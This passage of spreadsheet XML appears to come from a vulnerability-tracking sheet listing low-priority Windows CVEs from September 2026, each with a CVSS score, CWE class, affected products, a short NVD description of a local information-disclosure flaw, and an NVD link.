          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78629</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68830</t>
        </is>
      </c>
      <c r="D427" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E427" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F427" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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7" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-59</t>
        </is>
      </c>
      <c r="S427" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68831</t>
        </is>
      </c>
      <c r="D428" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E428" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F428" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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8" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr">
        <is>
          <t>CWE-552</t>
        </is>
      </c>
      <c r="S428" s="5" t="inlineStr">
        <is>
          <t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68851</t>
        </is>
      </c>
      <c r="D429" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E429" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F429" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K42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29" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S429" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows NTFS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68851</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68873</t>
        </is>
      </c>
      <c r="D430" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E430" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F430" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K430" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr">
        <is>
          <t>CWE-532, CWE-908</t>
        </is>
      </c>
      <c r="S430" s="5" t="inlineStr">
        <is>
          <t>Insertion of sensitive information into log file in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68873</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68886</t>
        </is>
      </c>
      <c r="D431" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E431" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F431" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K43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31" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr">
        <is>
          <t>CWE-209, CWE-416</t>
        </is>
      </c>
      <c r="S431" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Network Connection Broker allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68886</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69286</t>
        </is>
      </c>
      <c r="D432" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E432" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F432" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K43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32" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-20</t>
        </is>
      </c>
      <c r="S432" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69288</t>
        </is>
      </c>
      <c r="D433" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E433" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F433" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K43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33" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S433" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows GDI+ allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T433" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69288</t>
        </is>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B434" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C434" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69294</t>
        </is>
      </c>
      <c r="D434" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E434" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F434" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G434" s="5" t="inlineStr"/>
      <c r="H434" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I434" s="5" t="inlineStr"/>
      <c r="J434" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K434"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34" s="5" t="inlineStr"/>
      <c r="M434" s="5" t="inlineStr"/>
      <c r="N434" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O434" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P434" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q434" s="5" t="inlineStr"/>
      <c r="R434" s="5" t="inlineStr">
        <is>
          <t>CWE-209</t>
        </is>
      </c>
      <c r="S434" s="5" t="inlineStr">
        <is>
          <t>Generation of error message containing sensitive information in Microsoft COM for Windows allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T434" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69294</t>
        </is>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B435" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C435" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69315</t>
        </is>
      </c>
      <c r="D435" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E435" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F435" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G435" s="5" t="inlineStr"/>
      <c r="H435" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I435" s="5" t="inlineStr"/>
      <c r="J435" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K43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35" s="5" t="inlineStr"/>
      <c r="M435" s="5" t="inlineStr"/>
      <c r="N435" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O435" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P435" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q435" s="5" t="inlineStr"/>
      <c r="R435" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S435" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows License Manager allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T435" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69315</t>
        </is>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B436" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C436" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69318</t>
        </is>
      </c>
      <c r="D436" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E436" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F436" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G436" s="5" t="inlineStr"/>
      <c r="H436" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I436" s="5" t="inlineStr"/>
      <c r="J436" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K43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36" s="5" t="inlineStr"/>
      <c r="M436" s="5" t="inlineStr"/>
      <c r="N436" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O436" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P436" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q436" s="5" t="inlineStr"/>
      <c r="R436" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S436" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Imaging Component allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T436" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69318</t>
        </is>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B437" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C437" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69343</t>
        </is>
      </c>
      <c r="D437" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E437" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F437" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G437" s="5" t="inlineStr"/>
      <c r="H437" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I437" s="5" t="inlineStr"/>
      <c r="J437" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K43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37" s="5" t="inlineStr"/>
      <c r="M437" s="5" t="inlineStr"/>
      <c r="N437" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O437" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P437" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q437" s="5" t="inlineStr"/>
      <c r="R437" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S437" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69344</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K438" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q438" s="5" t="inlineStr"/>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S438" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Print Spooler Components allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69344</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69351</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K43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39" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q439" s="5" t="inlineStr"/>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>CWE-359</t>
        </is>
      </c>
      <c r="S439" s="5" t="inlineStr">
        <is>
          <t>Exposure of private personal information to an unauthorized actor in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69351</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69369</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K440" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q440" s="5" t="inlineStr"/>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S440" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DNS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69369</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69390</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K44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41" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q441" s="5" t="inlineStr"/>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S441" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69390</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69406</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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2" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q442" s="5" t="inlineStr"/>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S442" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Kernel allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="T442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69406</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69457</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4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3" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S443" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows USB Driver allows an authorized attacker to disclose information locally.</t>
        </is>
